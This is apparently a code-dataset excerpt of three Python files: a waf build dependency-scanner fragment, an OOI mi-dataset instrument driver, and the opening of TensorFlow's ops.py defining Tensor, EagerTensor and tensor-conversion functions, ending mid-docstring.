    # Matches paths rooted in the build variant directory or in "..".
    f = re.compile("^(" + self.env.variant() + r"|\.\.)[\\/](.*)$")

    for x in val:
        # FIX: initialize per iteration — previously, a path matching neither
        # regex left 'node' unbound (NameError on the first iteration) instead
        # of reaching the intended ValueError below.
        node = None
        if os.path.isabs(x):
            if not preproc.go_absolute:
                continue
            lock.acquire()
            try:
                node = bld.root.find_resource(x)
            finally:
                lock.release()
        else:
            g = re.search(re_src, x)
            if g:
                x = g.group(2)
                lock.acquire()
                try:
                    node = bld.bldnode.parent.find_resource(x)
                finally:
                    lock.release()
            else:
                g = re.search(f, x)
                if g:
                    x = g.group(2)
                    lock.acquire()
                    try:
                        node = bld.srcnode.find_resource(x)
                    finally:
                        lock.release()

        if id(node) == id(self.inputs[0]):
            # ignore the source file, it is already in the dependencies
            # this way, successful config tests may be retrieved from the cache
            continue

        if not node:
            raise ValueError('could not find %r for %r' % (x, self))
        else:
            nodes.append(node)

    Logs.debug('deps: real scanner for %s returned %s' % (str(self), str(nodes)))

    bld.node_deps[self.unique_id()] = nodes
    bld.raw_deps[self.unique_id()] = []

    # FIX: catch only the expected failure mode — the bare 'except:' here also
    # swallowed KeyboardInterrupt/SystemExit.
    try:
        del self.cache_sig
    except AttributeError:
        pass

    Task.Task.post_run(self)


import Constants, Utils


def sig_implicit_deps(self):
    """Fall back to a nil signature when implicit-dep computation fails."""
    try:
        return Task.Task.sig_implicit_deps(self)
    except Utils.WafError:
        return Constants.SIG_NIL


# Monkey-patch the cc/cxx task classes so they use the .d-file based scanner.
for name in 'cc cxx'.split():
    try:
        cls = Task.TaskBase.classes[name]
    except KeyError:
        pass
    else:
        cls.post_run = post_run
        cls.scan = scan
        cls.sig_implicit_deps = sig_implicit_deps
gpl-3.0
petercable/mi-dataset
mi/dataset/driver/ctdmo_ghqr/imodem/ctdmo_ghqr_imodem_telemetered_driver.py
7
2169
#!/usr/bin/env python

"""
@package mi.dataset.driver.ctdmo_ghqr.imodem
@file mi-dataset/mi/dataset/driver/ctdmo_ghqr/imodem/ctdmo_ghqr_imodem_telemetered_driver.py
@author Mark Worden
@brief Driver for the ctdmo_ghqr_imodem instrument

Release notes:

Initial Release
"""

from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.dataset_driver import SimpleDatasetDriver
from mi.dataset.parser.ctdmo_ghqr_imodem import CtdmoGhqrImodemParser, \
    CtdmoGhqrImodemParticleClassKey, \
    CtdmoGhqrImodemMetadataTelemeteredDataParticle, \
    CtdmoGhqrImodemInstrumentTelemeteredDataParticle
from mi.core.versioning import version


@version("15.6.1")
def parse(unused, source_file_path, particle_data_handler):
    """
    This is the method called by Uframe
    :param unused
    :param source_file_path This is the full path and filename of the file to be parsed
    :param particle_data_handler Java Object to consume the output of the parser
    :return particle_data_handler
    """
    with open(source_file_path, 'rb') as stream_handle:
        # Drive the whole file through the parser; particles are delivered
        # to particle_data_handler as a side effect.
        file_driver = CtdmoGhqrImodemTelemeteredDriver(
            unused, stream_handle, particle_data_handler)
        file_driver.processFileStream()

    return particle_data_handler


class CtdmoGhqrImodemTelemeteredDriver(SimpleDatasetDriver):
    """
    All this needs to do is create a concrete _build_parser method
    """

    def _build_parser(self, stream_handle):
        # Map particle-class keys to the telemetered particle implementations.
        telemetered_particle_classes = {
            CtdmoGhqrImodemParticleClassKey.METADATA_PARTICLE_CLASS:
                CtdmoGhqrImodemMetadataTelemeteredDataParticle,
            CtdmoGhqrImodemParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
                CtdmoGhqrImodemInstrumentTelemeteredDataParticle,
        }

        parser_config = {
            DataSetDriverConfigKeys.PARTICLE_MODULE:
                'mi.dataset.parser.ctdmo_ghqr_imodem',
            DataSetDriverConfigKeys.PARTICLE_CLASS: None,
            DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT:
                telemetered_particle_classes,
        }

        return CtdmoGhqrImodemParser(parser_config, stream_handle,
                                     self._exception_callback)
bsd-2-clause
dyoung418/tensorflow
tensorflow/python/framework/ops.py
1
190049
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Classes and functions used to construct graphs.""" # pylint: disable=g-bad-name from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import linecache import re import sys import threading import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.framework import attr_value_pb2 from tensorflow.core.framework import function_pb2 from tensorflow.core.framework import graph_pb2 from tensorflow.core.framework import node_def_pb2 from tensorflow.core.framework import op_def_pb2 from tensorflow.core.framework import versions_pb2 from tensorflow.python import pywrap_tensorflow as c_api from tensorflow.python.eager import context from tensorflow.python.eager import core from tensorflow.python.eager import tape from tensorflow.python.framework import c_api_util from tensorflow.python.framework import device as pydev from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import op_def_registry from tensorflow.python.framework import registry from tensorflow.python.framework import tensor_shape from tensorflow.python.framework import versions from tensorflow.python.platform import app from 
tensorflow.python.platform import tf_logging as logging from tensorflow.python.util import compat from tensorflow.python.util import decorator_utils from tensorflow.python.util import tf_contextlib # Temporary global switch determining if we should enable the work-in-progress # calls to the C API. Currently disabled by default but can be manually enabled # e.g. in tests. This will be removed once all functionality is supported and # there's no performance penalty with it enabled. # # TODO(skyewm) before we can remove this: # - functions # - import_graph_def() incrementally adds inputs to ops (i.e. creates an # Operation and then calls _add_input()). The current code requires that all # inputs be specified when creating the Operation (since we call # TF_FinishOperation()). # - ops_test.py (and others?) create unregistered op types # - while loop # - performance (e.g. delete/refactor redundant Python functionality, switch to # new session API) _USE_C_API = False def tensor_id(tensor): """Returns a unique identifier for this Tensor.""" return tensor._id # pylint: disable=protected-access class _NullContextmanager(object): def __enter__(self): pass def __exit__(self, type_arg, value_arg, traceback_arg): return False # False values do not suppress exceptions def _override_helper(clazz_object, operator, func): """Overrides (string) operator on Tensors to call func. Args: clazz_object: the class to override for; either Tensor or SparseTensor. operator: the string name of the operator to override. func: the function that replaces the overridden operator. Raises: ValueError: If operator has already been overwritten, or if operator is not allowed to be overwritten. """ existing = getattr(clazz_object, operator, None) if existing is not None: # Check to see if this is a default method-wrapper or slot wrapper which # will be true for the comparison operators. 
if not isinstance(existing, type(object.__lt__)): raise ValueError("operator %s cannot be overwritten again on class %s." % (operator, clazz_object)) if operator not in Tensor.OVERLOADABLE_OPERATORS: raise ValueError("Overriding %s is disallowed" % operator) setattr(clazz_object, operator, func) def _as_graph_element(obj): """Convert `obj` to a graph element if possible, otherwise return `None`. Args: obj: Object to convert. Returns: The result of `obj._as_graph_element()` if that method is available; otherwise `None`. """ conv_fn = getattr(obj, "_as_graph_element", None) if conv_fn and callable(conv_fn): return conv_fn() return None _TENSOR_LIKE_TYPES = tuple() def is_dense_tensor_like(t): """EXPERIMENTAL: Returns true if `t` implements the tensor interface. See `register_dense_tensor_like_type()` for the current definition of a "tensor-like type". Args: t: An object. Returns: True iff `t` is an instance of one of the registered "tensor-like" types. """ return isinstance(t, _TENSOR_LIKE_TYPES) def register_dense_tensor_like_type(tensor_type): """EXPERIMENTAL: Registers `tensor_type` as implementing the tensor interface. A "tensor-like type" can represent a single dense tensor, and implements the `name` and `dtype` properties. Args: tensor_type: A type implementing the tensor interface. Raises: TypeError: If `tensor_type` does not implement the tensor interface. """ try: if not isinstance(tensor_type.name, property): raise TypeError("Type %s does not define a `name` property") except AttributeError: raise TypeError("Type %s does not define a `name` property") try: if not isinstance(tensor_type.dtype, property): raise TypeError("Type %s does not define a `dtype` property") except AttributeError: raise TypeError("Type %s does not define a `dtype` property") # We expect this list to be small, so choose quadratic complexity # for registration, so that we have a tuple that can be used for # more efficient `isinstance` checks later. 
global _TENSOR_LIKE_TYPES _TENSOR_LIKE_TYPES = tuple(list(_TENSOR_LIKE_TYPES) + [tensor_type]) def uid(): """A unique (within this program execution) integer.""" return c_api.TFE_Py_UID() def numpy_text(tensor, is_repr=False): """Human readable representation of a tensor's numpy value.""" if tensor.dtype.is_numpy_compatible: text = repr(tensor.numpy()) if is_repr else str(tensor.numpy()) else: text = "<unprintable>" if "\n" in text: text = "\n" + text return text # NOTE(ebrevdo): Do not subclass this. If you do, I will break you on purpose. class _TensorLike(object): """Internal cls for grouping Tensor, SparseTensor, ..., for is_instance.""" pass class Tensor(_TensorLike): """Represents one of the outputs of an `Operation`. A `Tensor` is a symbolic handle to one of the outputs of an `Operation`. It does not hold the values of that operation's output, but instead provides a means of computing those values in a TensorFlow @{tf.Session}. This class has two primary purposes: 1. A `Tensor` can be passed as an input to another `Operation`. This builds a dataflow connection between operations, which enables TensorFlow to execute an entire `Graph` that represents a large, multi-step computation. 2. After the graph has been launched in a session, the value of the `Tensor` can be computed by passing it to @{tf.Session.run}. `t.eval()` is a shortcut for calling `tf.get_default_session().run(t)`. In the following example, `c`, `d`, and `e` are symbolic `Tensor` objects, whereas `result` is a numpy array that stores a concrete value: ```python # Build a dataflow graph. c = tf.constant([[1.0, 2.0], [3.0, 4.0]]) d = tf.constant([[1.0, 1.0], [0.0, 1.0]]) e = tf.matmul(c, d) # Construct a `Session` to execute the graph. sess = tf.Session() # Execute the graph and store the value that `e` represents in `result`. result = sess.run(e) ``` """ # List of Python operators that we allow to override. OVERLOADABLE_OPERATORS = { # Binary. 
"__add__", "__radd__", "__sub__", "__rsub__", "__mul__", "__rmul__", "__div__", "__rdiv__", "__truediv__", "__rtruediv__", "__floordiv__", "__rfloordiv__", "__mod__", "__rmod__", "__lt__", "__le__", "__gt__", "__ge__", "__and__", "__rand__", "__or__", "__ror__", "__xor__", "__rxor__", "__getitem__", "__pow__", "__rpow__", # Unary. "__invert__", "__neg__", "__abs__", "__matmul__", "__rmatmul__" } def __init__(self, op, value_index, dtype): """Creates a new `Tensor`. Args: op: An `Operation`. `Operation` that computes this tensor. value_index: An `int`. Index of the operation's endpoint that produces this tensor. dtype: A `DType`. Type of elements stored in this tensor. Raises: TypeError: If the op is not an `Operation`. """ if not isinstance(op, Operation): raise TypeError("op needs to be an Operation: %s" % op) self._op = op self._value_index = value_index self._dtype = dtypes.as_dtype(dtype) self._shape = tensor_shape.unknown_shape() # List of operations that use this Tensor as input. We maintain this list # to easily navigate a computation graph. self._consumers = [] # Attributes used for C++ shape inference. Not inspected, only forwarded. # If set, will be a HandleData object from cpp_shape_inference.proto. self._handle_data = None self._id = uid() @property def op(self): """The `Operation` that produces this tensor as an output.""" return self._op @property def dtype(self): """The `DType` of elements in this tensor.""" return self._dtype @property def graph(self): """The `Graph` that contains this tensor.""" return self._op.graph @property def name(self): """The string name of this tensor.""" if not self._op.name: raise ValueError("Operation was not named: %s" % self._op) return "%s:%d" % (self._op.name, self._value_index) @property def device(self): """The name of the device on which this tensor will be produced, or None.""" return self._op.device @property def shape(self): """Returns the `TensorShape` that represents the shape of this tensor. 
The shape is computed using shape inference functions that are registered in the Op for each `Operation`. See @{tf.TensorShape} for more details of what a shape represents. The inferred shape of a tensor is used to provide shape information without having to launch the graph in a session. This can be used for debugging, and providing early error messages. For example: ```python c = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) print(c.shape) ==> TensorShape([Dimension(2), Dimension(3)]) d = tf.constant([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]]) print(d.shape) ==> TensorShape([Dimension(4), Dimension(2)]) # Raises a ValueError, because `c` and `d` do not have compatible # inner dimensions. e = tf.matmul(c, d) f = tf.matmul(c, d, transpose_a=True, transpose_b=True) print(f.shape) ==> TensorShape([Dimension(3), Dimension(4)]) ``` In some cases, the inferred shape may have unknown dimensions. If the caller has additional information about the values of these dimensions, `Tensor.set_shape()` can be used to augment the inferred shape. Returns: A `TensorShape` representing the shape of this tensor. """ return self._shape def __iter__(self): if context.in_graph_mode(): raise TypeError( "`Tensor` objects are not iterable when eager execution is not " "enabled. To iterate over this tensor use `tf.map_fn`.") shape = self._shape_tuple() if shape is None: raise TypeError("Cannot iterate over a tensor with unknown shape.") if not shape: raise TypeError("Cannot iterate over a scalar tensor.") if shape[0] is None: raise TypeError( "Cannot iterate over a tensor with unknown first dimension.") for i in xrange(shape[0]): yield self[i] def _shape_as_list(self): if self._shape.ndims is not None: return [dim.value for dim in self._shape.dims] else: return None def _shape_tuple(self): shape = self._shape_as_list() if shape is None: return None return tuple(shape) def _rank(self): """Integer rank of this Tensor, if known, else None. 
Returns: Integer rank or None """ return self._shape.ndims def get_shape(self): """Alias of Tensor.shape.""" return self.shape def set_shape(self, shape): """Updates the shape of this tensor. This method can be called multiple times, and will merge the given `shape` with the current shape of this tensor. It can be used to provide additional information about the shape of this tensor that cannot be inferred from the graph alone. For example, this can be used to provide additional information about the shapes of images: ```python _, image_data = tf.TFRecordReader(...).read(...) image = tf.image.decode_png(image_data, channels=3) # The height and width dimensions of `image` are data dependent, and # cannot be computed without executing the op. print(image.shape) ==> TensorShape([Dimension(None), Dimension(None), Dimension(3)]) # We know that each image in this dataset is 28 x 28 pixels. image.set_shape([28, 28, 3]) print(image.shape) ==> TensorShape([Dimension(28), Dimension(28), Dimension(3)]) ``` Args: shape: A `TensorShape` representing the shape of this tensor. Raises: ValueError: If `shape` is not compatible with the current shape of this tensor. """ # TODO(skyewm): call C API self._shape = self._shape.merge_with(shape) @property def value_index(self): """The index of this tensor in the outputs of its `Operation`.""" return self._value_index def consumers(self): """Returns a list of `Operation`s that consume this tensor. Returns: A list of `Operation`s. """ return self._consumers def _add_consumer(self, consumer): """Add a consumer to this tensor. Args: consumer: an Operation. Raises: TypeError: if the consumer is not an Operation. """ if not isinstance(consumer, Operation): raise TypeError("Consumer must be an Operation: %s" % consumer) self._consumers.append(consumer) def _as_node_def_input(self): """Return a value to use for the NodeDef "input" attribute. 
The returned string can be used in a NodeDef "input" attribute to indicate that the NodeDef uses this Tensor as input. Raises: ValueError: if this Tensor's Operation does not have a name. Returns: a string. """ if not self._op.name: raise ValueError("Operation was not named: %s" % self._op) if self._value_index == 0: return self._op.name else: return "%s:%d" % (self._op.name, self._value_index) def _as_tf_output(self): assert self.op._c_op # pylint: disable=protected-access tf_output = c_api.TF_Output() tf_output.oper = self.op._c_op # pylint: disable=protected-access tf_output.index = self.value_index return tf_output def __str__(self): return "Tensor(\"%s\"%s%s%s)" % ( self.name, (", shape=%s" % self.get_shape()) if self.get_shape().ndims is not None else "", (", dtype=%s" % self._dtype.name) if self._dtype else "", (", device=%s" % self.device) if self.device else "") def __repr__(self): return "<tf.Tensor '%s' shape=%s dtype=%s>" % (self.name, self.get_shape(), self._dtype.name) def __hash__(self): # Necessary to support Python's collection membership operators return id(self) def __eq__(self, other): # Necessary to support Python's collection membership operators return id(self) == id(other) # NOTE(mrry): This enables the Tensor's overloaded "right" binary # operators to run when the left operand is an ndarray, because it # accords the Tensor class higher priority than an ndarray, or a # numpy matrix. # TODO(mrry): Convert this to using numpy's __numpy_ufunc__ # mechanism, which allows more control over how Tensors interact # with ndarrays. __array_priority__ = 100 @staticmethod def _override_operator(operator, func): _override_helper(Tensor, operator, func) def __bool__(self): """Dummy method to prevent a tensor from being used as a Python `bool`. This overload raises a `TypeError` when the user inadvertently treats a `Tensor` as a boolean (e.g. in an `if` statement). For example: ```python if tf.constant(True): # Will raise. # ... 
if tf.constant(5) < tf.constant(7): # Will raise. # ... ``` This disallows ambiguities between testing the Python value vs testing the dynamic condition of the `Tensor`. Raises: `TypeError`. """ raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. " "Use `if t is not None:` instead of `if t:` to test if a " "tensor is defined, and use TensorFlow ops such as " "tf.cond to execute subgraphs conditioned on the value of " "a tensor.") def __nonzero__(self): """Dummy method to prevent a tensor from being used as a Python `bool`. This is the Python 2.x counterpart to `__bool__()` above. Raises: `TypeError`. """ raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. " "Use `if t is not None:` instead of `if t:` to test if a " "tensor is defined, and use TensorFlow ops such as " "tf.cond to execute subgraphs conditioned on the value of " "a tensor.") def eval(self, feed_dict=None, session=None): """Evaluates this tensor in a `Session`. Calling this method will execute all preceding operations that produce the inputs needed for the operation that produces this tensor. *N.B.* Before invoking `Tensor.eval()`, its graph must have been launched in a session, and either a default session must be available, or `session` must be specified explicitly. Args: feed_dict: A dictionary that maps `Tensor` objects to feed values. See @{tf.Session.run} for a description of the valid feed values. session: (Optional.) The `Session` to be used to evaluate this tensor. If none, the default session will be used. Returns: A numpy array corresponding to the value of this tensor. """ return _eval_using_default_session(self, feed_dict, self.graph, session) def _dup(self): ret = copy.copy(self) ret._id = uid() # pylint: disable=protected-access return ret # TODO(agarwal): consider getting rid of this. 
class _EagerTensorBase(Tensor): """Base class for EagerTensor.""" @staticmethod def _delete_trace(tid): """Helper function to be called by __del__ of the subclass.""" tape.delete_trace(tid) @property def dtype(self): # Note: using the intern table directly here as this is # performance-sensitive in some models. return dtypes._INTERN_TABLE[self._datatype_enum()] # pylint: disable=protected-access def numpy(self): """Returns a numpy array with the same contents as the Tensor. TODO(ashankar,agarwal): Perhaps this should NOT reference the underlying buffer but instead always explicitly copy? Note that currently it may or may not copy based on whether the numpy data is properly aligned or not. Returns: A numpy array that may share memory with the Tensor object. Any changes to one may be reflected in the other. Raises: ValueError: if the type of this Tensor is not representable in numpy. """ if self.dtype == dtypes.resource: raise ValueError("Resource handles are not convertible to numpy.") return self.cpu()._numpy() # pylint: disable=protected-access # __int__ and __float__ may copy the tensor to CPU and # only work for scalars; values are cast as per numpy. def __int__(self): return int(self.numpy()) def __float__(self): return float(self.numpy()) def __array__(self): return np.array(self.numpy()) def _numpy(self): raise NotImplementedError() def __copy__(self): # Eager Tensors are immutable so it's safe to return themselves as a copy. return self def __deepcopy__(self, memo): # Eager Tensors are immutable so it's safe to return themselves as a copy. del memo return self def _datatype_enum(self): raise NotImplementedError() def _shape_tuple(self): """The shape of this Tensor, as a tuple. This is more performant than tuple(shape().as_list()) as it avoids two list and one object creation. 
Marked private for now as from an API perspective, it would be better to have a single performant way of getting a shape rather than exposing shape() and shape_tuple() (and heaven forbid, shape_list() etc. as well!). Punting on that for now, but ideally one would work things out and remove the need for this method. Returns: tuple with the shape. """ raise NotImplementedError() def _rank(self): """Integer rank of this Tensor. Unlike regular Tensors, the rank is always known for EagerTensors. This is more performant than len(self._shape_tuple()) Returns: Integer rank """ raise NotImplementedError() def _copy_to_device(self, context, device): # pylint: disable=redefined-outer-name raise NotImplementedError() def __str__(self): return "tf.Tensor(%s, shape=%s, dtype=%s)" % (numpy_text(self), self.shape, self.dtype.name) def __repr__(self): return "<tf.Tensor: id=%s, shape=%s, dtype=%s, numpy=%s>" % ( self._id, self.shape, self.dtype.name, numpy_text(self, is_repr=True)) @staticmethod def _override_operator(name, func): setattr(_EagerTensorBase, name, func) def _copy(self, ctx=None, device_name=None): """Copies tensor to dest device.""" # pylint: disable=protected-access # Creates a new tensor on the dest device. if ctx is None: ctx = context.context() if device_name is None: device_name = ctx.device_name # pylint: disable=protected-access try: new_tensor = self._copy_to_device(context=ctx._handle, device=device_name) except core._NotOkStatusException as e: six.raise_from(core._status_to_exception(e.code, e.message), None) if core.active_trace() is not None: core.active_trace().record_tensor("COPY", tensor_id(new_tensor), new_tensor.device, new_tensor.shape.num_elements()) # Record the copy on tape and define backprop copy as well. 
if not context.in_graph_mode(): self_device = self.device def grad_fun(dresult): return [dresult._copy(device_name=self_device)] tape.record_operation("_copy", [new_tensor], [self], grad_fun) return new_tensor # pylint: enable=protected-access def _dup(self): return self._copy(device_name=self.device) @property def shape(self): return tensor_shape.TensorShape(self._shape_tuple()) def get_shape(self): """Alias of Tensor.shape.""" return self.shape def _shape_as_list(self): """The shape of the tensor as a list.""" return list(self._shape_tuple()) def cpu(self): """A copy of this Tensor with contents backed by host memory.""" return self._copy(context.context(), "CPU:0") def gpu(self, gpu_index=0): """A copy of this Tensor with contents backed by memory on the GPU. Arguments: gpu_index: Identifies which GPU to place the contents on the returned Tensor in. Returns: A GPU-memory backed Tensor object initialized with the same contents as this Tensor. """ return self._copy(context.context(), "GPU:" + str(gpu_index)) def __bool__(self): if self._shape_tuple() != (): # pylint: disable=g-explicit-bool-comparison raise ValueError( "Non-scalar tensor %s cannot be converted to boolean." % repr(self)) if self.dtype != dtypes.bool: raise ValueError( "Non-boolean tensor %s cannot be converted to boolean." % repr(self)) return bool(self.cpu().numpy()) def __nonzero__(self): return self.__bool__() def set_shape(self, shape): if not self.shape.is_compatible_with(shape): raise ValueError( "EagerTensor's shape %s is not compatible with supplied shape %s" % (self.shape, shape)) # Methods not supported / implemented for Eager Tensors. 
  # --- Graph-only API surface, unsupported for eager tensors. ---------------
  # Eager tensors are concrete values rather than symbolic graph nodes, so
  # the graph-related attributes raise instead of returning stale data.

  @property
  def op(self):
    raise AttributeError("op not supported for Eager Tensors.")

  @property
  def graph(self):
    raise AttributeError("graph not supported for Eager Tensors.")

  @property
  def name(self):
    raise AttributeError("name not supported for Eager Tensors.")

  @property
  def value_index(self):
    raise AttributeError("value_index not supported for Eager Tensors.")

  def consumers(self):
    raise NotImplementedError("consumers not supported for Eager Tensors.")

  def _add_consumer(self, consumer):
    raise NotImplementedError("_add_consumer not supported for Eager Tensors.")

  def _as_node_def_input(self):
    raise NotImplementedError(
        "_as_node_def_input not supported for Eager Tensors.")

  def _as_tf_output(self):
    raise NotImplementedError("_as_tf_output not supported for Eager Tensors.")

  def eval(self, feed_dict=None, session=None):
    raise NotImplementedError("eval not supported for Eager Tensors.")


# This call creates an EagerTensor class, as a subclass of _EagerTensorBase,
# and registers it with the current module.
EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)


def _TensorTensorConversionFunction(t, dtype=None, name=None, as_ref=False):
  # Identity conversion for values that are already Tensors; only validates
  # that the requested dtype (if any) is compatible with the tensor's dtype.
  _ = name, as_ref
  if dtype and not dtype.is_compatible_with(t.dtype):
    raise ValueError(
        "Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
        (dtype.name, t.dtype.name, str(t)))
  return t


# Registry of tensor-conversion functions keyed by priority; lower priorities
# are consulted first (see register_tensor_conversion_function below).
_tensor_conversion_func_registry = {
    0: [(Tensor, _TensorTensorConversionFunction)]
}
# Cache mapping a concrete Python type to the conversion functions that apply
# to it; invalidated whenever a new conversion function is registered.
_tensor_conversion_func_cache = {}
_tensor_conversion_func_lock = threading.Lock()

register_dense_tensor_like_type(Tensor)


def convert_to_tensor(value, dtype=None, name=None, preferred_dtype=None):
  """Converts the given `value` to a `Tensor`.

  This function converts Python objects of various types to `Tensor`
  objects. It accepts `Tensor` objects, numpy arrays, Python lists, and
  Python scalars. For example:

  ```python
  import numpy as np

  def my_func(arg):
    arg = tf.convert_to_tensor(arg, dtype=tf.float32)
    return tf.matmul(arg, arg) + arg

  # The following calls are equivalent.
  value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]]))
  value_2 = my_func([[1.0, 2.0], [3.0, 4.0]])
  value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32))
  ```

  This function can be useful when composing a new operation in Python
  (such as `my_func` in the example above). All standard Python op
  constructors apply this function to each of their Tensor-valued
  inputs, which allows those ops to accept numpy arrays, Python lists,
  and scalars in addition to `Tensor` objects.

  Args:
    value: An object whose type has a registered `Tensor` conversion function.
    dtype: Optional element type for the returned tensor. If missing, the
      type is inferred from the type of `value`.
    name: Optional name to use if a new `Tensor` is created.
    preferred_dtype: Optional element type for the returned tensor,
      used when dtype is None. In some cases, a caller may not have a
      dtype in mind when converting to a tensor, so preferred_dtype
      can be used as a soft preference.  If the conversion to
      `preferred_dtype` is not possible, this argument has no effect.

  Returns:
    A `Tensor` based on `value`.

  Raises:
    TypeError: If no conversion function is registered for `value`.
    RuntimeError: If a registered conversion function returns an invalid value.

  """
  return internal_convert_to_tensor(
      value=value,
      dtype=dtype,
      name=name,
      preferred_dtype=preferred_dtype,
      as_ref=False)
def _error_prefix(name):
  # Prefix for conversion error messages: "<name>: " when a name was
  # supplied, otherwise the empty string.
  return "" if name is None else "%s: " % name


def internal_convert_to_tensor(value,
                               dtype=None,
                               name=None,
                               as_ref=False,
                               preferred_dtype=None,
                               ctx=None):
  """Converts the given `value` to a `Tensor`.

  This function converts Python objects of various types to `Tensor`
  objects. It accepts `Tensor` objects, numpy arrays, Python lists, and
  Python scalars.

  This function can be useful when composing a new operation in Python.
  All standard Python op constructors apply this function to each of their
  Tensor-valued inputs, which allows those ops to accept numpy arrays, Python
  lists, and scalars in addition to `Tensor` objects.

  Args:
    value: An object whose type has a registered `Tensor` conversion function.
    dtype: Optional element type for the returned tensor. If missing, the
      type is inferred from the type of `value`.
    name: Optional name to use if a new `Tensor` is created.
    as_ref: True if we want the mutable view of Variables, if applicable.
    preferred_dtype: Optional element type for the returned tensor,
      used when dtype is None. In some cases, a caller may not have a
      dtype in mind when converting to a tensor, so preferred_dtype
      can be used as a soft preference.  If the conversion to
      `preferred_dtype` is not possible, this argument has no effect.
    ctx: Optional: The value of context.context().

  Returns:
    A `Tensor` based on `value`.

  Raises:
    TypeError: If no conversion function is registered for `value`.
    RuntimeError: If a registered conversion function returns an invalid value.

  """
  if ctx is None:
    ctx = context.context()
  if ctx.in_eager_mode():
    # Fast path for EagerTensors that don't need any conversion.
    if isinstance(value, EagerTensor):
      # Note that we don't check that value's dtype matches the dtype
      # argument.  We expect that the C runtime will do that checking
      # when we execute the kernel.
      return value

  if dtype is not None:
    dtype = dtypes.as_dtype(dtype)
  unwrapped_type = type(value)
  # Look up (and lazily build) the list of conversion functions applicable to
  # this concrete Python type, ordered by registration priority.
  conversion_func_list = _tensor_conversion_func_cache.get(unwrapped_type, None)
  if conversion_func_list is None:
    with _tensor_conversion_func_lock:
      conversion_func_list = []
      for _, funcs_at_priority in sorted(
          _tensor_conversion_func_registry.items()):
        for base_type, conversion_func in funcs_at_priority:
          if isinstance(value, base_type):
            conversion_func_list.append((base_type, conversion_func))
      _tensor_conversion_func_cache[unwrapped_type] = conversion_func_list

  for base_type, conversion_func in conversion_func_list:
    # If dtype is None but preferred_dtype is not None, we try to
    # cast to preferred_dtype first.
    ret = None
    if dtype is None and preferred_dtype is not None:
      try:
        ret = conversion_func(
            value, dtype=preferred_dtype, name=name, as_ref=as_ref)
      except (TypeError, ValueError, errors.UnimplementedError,
              errors.InvalidArgumentError):
        # Could not coerce the conversion to use the preferred dtype.
        ret = None

      if ret is not None and ret is not NotImplemented:
        if (ret.dtype.base_dtype !=
            dtypes.as_dtype(preferred_dtype).base_dtype):
          raise TypeError("convert_to_tensor did not convert to "
                          "the preferred dtype: %s vs %s " %
                          (ret.dtype.base_dtype,
                           dtypes.as_dtype(preferred_dtype).base_dtype))

    if ret is None:
      ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)

    if ret is NotImplemented:
      # This conversion function declined; try the next registered one.
      continue

    if not isinstance(ret, Tensor):
      raise RuntimeError(
          "%sConversion function %r for type %s returned non-Tensor: %r" %
          (_error_prefix(name), conversion_func, base_type, ret))
    if dtype and not dtype.is_compatible_with(ret.dtype):
      raise RuntimeError(
          "%sConversion function %r for type %s returned incompatible "
          "dtype: requested = %s, actual = %s" %
          (_error_prefix(name), conversion_func, base_type, dtype.name,
           ret.dtype.name))
    return ret
  raise TypeError("%sCannot convert %r with type %s to Tensor: "
                  "no conversion function registered." %
                  (_error_prefix(name), value, unwrapped_type))


def internal_convert_n_to_tensor(values,
                                 dtype=None,
                                 name=None,
                                 as_ref=False,
                                 preferred_dtype=None,
                                 ctx=None):
  """Converts `values` to a list of `Tensor` objects.

  Args:
    values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
    name: (Optional.) A name prefix to used when a new `Tensor` is
      created, in which case element `i` will be given the name `name
      + '_' + i`.
    as_ref: True if the caller wants the results as ref tensors.
    preferred_dtype: Optional element type for the returned tensors,
      used when dtype is None. In some cases, a caller may not have a
      dtype in mind when converting to a tensor, so preferred_dtype
      can be used as a soft preference.  If the conversion to
      `preferred_dtype` is not possible, this argument has no effect.
    ctx: The value of context.context().

  Returns:
    A list of `Tensor` and/or `IndexedSlices` objects.

  Raises:
    TypeError: If no conversion function is registered for an element in
      `values`.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  if not isinstance(values, collections.Sequence):
    raise TypeError("values must be a list.")
  ret = []
  if ctx is None:
    ctx = context.context()
  for i, value in enumerate(values):
    n = None if name is None else "%s_%d" % (name, i)
    ret.append(
        internal_convert_to_tensor(
            value,
            dtype=dtype,
            name=n,
            as_ref=as_ref,
            preferred_dtype=preferred_dtype,
            ctx=ctx))
  return ret


def convert_n_to_tensor(values, dtype=None, name=None, preferred_dtype=None):
  """Converts `values` to a list of `Tensor` objects.

  Args:
    values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
    name: (Optional.) A name prefix to used when a new `Tensor` is
      created, in which case element `i` will be given the name `name
      + '_' + i`.
    preferred_dtype: Optional element type for the returned tensors,
      used when dtype is None. In some cases, a caller may not have a
      dtype in mind when converting to a tensor, so preferred_dtype
      can be used as a soft preference.  If the conversion to
      `preferred_dtype` is not possible, this argument has no effect.

  Returns:
    A list of `Tensor` and/or `IndexedSlices` objects.

  Raises:
    TypeError: If no conversion function is registered for an element in
